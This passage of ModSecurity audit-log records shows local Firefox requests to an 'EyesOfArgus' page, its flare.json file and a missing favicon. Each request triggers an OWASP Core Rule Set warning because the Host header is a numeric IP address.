\"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc3-H8AAQEAAAkVV5IAAAAA\"]"],"stopwatch":{"p1":441,"p2":1203,"p3":60,"p4":152,"p5":54,"sr":22,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:44:44 --0400","transaction_id":"WRc3-H8AAQEAAAkVV5MAAAAA","remote_address":"127.0.0.1","remote_port":42586,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc3-H8AAQEAAAkVV5MAAAAA\"]"],"stopwatch":{"p1":412,"p2":922,"p3":47,"p4":355,"p5":50,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:44:44 --0400","transaction_id":"WRc3-H8AAQEAAAkVV5QAAAAA","remote_address":"127.0.0.1","remote_port":42586,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc3-H8AAQEAAAkVV5QAAAAA\"]"],"stopwatch":{"p1":382,"p2":879,"p3":44,"p4":237,"p5":46,"sr":15,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:46:21 --0400","transaction_id":"WRc4XX8AAQEAABwNvyAAAAAA","remote_address":"127.0.0.1","remote_port":42646,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc4XX8AAQEAABwNvyAAAAAA\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":553,"p2":1248,"p3":51,"p4":310,"p5":55,"sr":40,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:46:21 --0400","transaction_id":"WRc4XX8AAQEAABwNvyEAAAAA","remote_address":"127.0.0.1","remote_port":42646,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:44:39 GMT","ETag":"\"cc8-54f6a89c37b32-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1210","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc4XX8AAQEAABwNvyEAAAAA\"]"],"stopwatch":{"p1":380,"p2":869,"p3":58,"p4":312,"p5":50,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:46:22 --0400","transaction_id":"WRc4Xn8AAQEAABwNvyIAAAAA","remote_address":"127.0.0.1","remote_port":42646,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:46:18 GMT","ETag":"\"295-54f6a8fa838c0\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc4Xn8AAQEAABwNvyIAAAAA\"]"],"stopwatch":{"p1":381,"p2":885,"p3":67,"p4":140,"p5":58,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:46:22 --0400","transaction_id":"WRc4Xn8AAQEAABwNvyMAAAAA","remote_address":"127.0.0.1","remote_port":42646,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4Xn8AAQEAABwNvyMAAAAA\"]"],"stopwatch":{"p1":415,"p2":939,"p3":52,"p4":242,"p5":82,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:46:22 --0400","transaction_id":"WRc4Xn8AAQEAABwNvyQAAAAA","remote_address":"127.0.0.1","remote_port":42646,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4Xn8AAQEAABwNvyQAAAAA\"]"],"stopwatch":{"p1":377,"p2":797,"p3":90,"p4":312,"p5":47,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:01 --0400","transaction_id":"WRc4hX8AAQEAABwOGnsAAAAB","remote_address":"127.0.0.1","remote_port":42666,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc4hX8AAQEAABwOGnsAAAAB\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":852,"p2":2085,"p3":90,"p4":547,"p5":100,"sr":52,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:01 --0400","transaction_id":"WRc4hX8AAQEAABwOGnwAAAAB","remote_address":"127.0.0.1","remote_port":42666,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:46:57 GMT","ETag":"\"ccc-54f6a91f7e6c1-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id 